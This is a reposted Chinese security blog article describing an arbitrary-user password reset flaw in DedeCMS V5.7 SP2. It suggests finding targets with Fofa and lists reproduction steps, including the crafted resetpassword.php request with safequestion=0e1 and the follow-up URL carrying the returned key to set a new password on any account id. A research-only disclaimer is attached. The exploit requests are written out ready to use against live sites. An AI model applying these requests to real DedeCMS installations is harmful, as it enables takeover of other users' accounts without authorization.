DedeCMS任意用户密码重置漏洞

admin

140559
文章

117
评论

2023年11月8日00:15:07评论77 views字数 367阅读1分13秒阅读模式

漏洞环境

Fofa搜dedecms

漏洞危害

重置系统的所有账号的密码

影响范围

DeDecms V5.7 SP2最新版本

漏洞复现

首先注册账号0000001/0000002

DedeCMS任意用户密码重置漏洞

登录成功

DedeCMS任意用户密码重置漏洞

通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器，再次访问登录页面

DedeCMS任意用户密码重置漏洞

构造请求包生成poc

/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=16

DedeCMS任意用户密码重置漏洞

根据poc构造重置密码的url

http://www.xxx.com/member/resetpassword.php?dopost=getpasswd&id=16&key=b8sJ1HN6

DedeCMS任意用户密码重置漏洞

直接在这对目标账号修改个新密码就行了。

原文始发于微信公众号（赛瑞攻防实验室）：DedeCMS任意用户密码重置漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

伪装韩国国家安全战略智库的APT37攻击案例分析（Operation.ToyBox Story）

技战法到底是个啥？护网必看！

⼤华智慧园区综合管理平台⽂件上传(CNVD2024-35311) poc

漏洞挖掘—利用查询功能获取敏感信息

LLM学习笔记：最好的学习方法是带着问题去寻找答案

使用 Python 转储凭证：自动化 LSASS 访问和凭证提取后利用

MSF（3）免杀混淆

C2流量隐藏-云函数

某鹅一次AK /SK 泄露导致拿下存储桶

【域渗透】混合域环境中的密码哈希同步攻击（PHS）

本文由 admin 发表于 2023年11月8日00:15:07
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
DedeCMS任意用户密码重置漏洞https://cn-sec.com/archives/887304.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

DedeCMS任意用户密码重置漏洞

漏洞环境

漏洞危害

影响范围

漏洞复现

伪装韩国国家安全战略智库的APT37攻击案例分析（Operation.ToyBox Story）

技战法到底是个啥？护网必看！

⼤华智慧园区综合管理平台⽂件上传(CNVD2024-35311) poc

漏洞挖掘—利用查询功能获取敏感信息

LLM学习笔记：最好的学习方法是带着问题去寻找答案

使用 Python 转储凭证：自动化 LSASS 访问和凭证提取后利用

MSF（3）免杀混淆

C2流量隐藏-云函数

某鹅一次AK /SK 泄露导致拿下存储桶

【域渗透】混合域环境中的密码哈希同步攻击（PHS）

发表评论

在线咨询

微信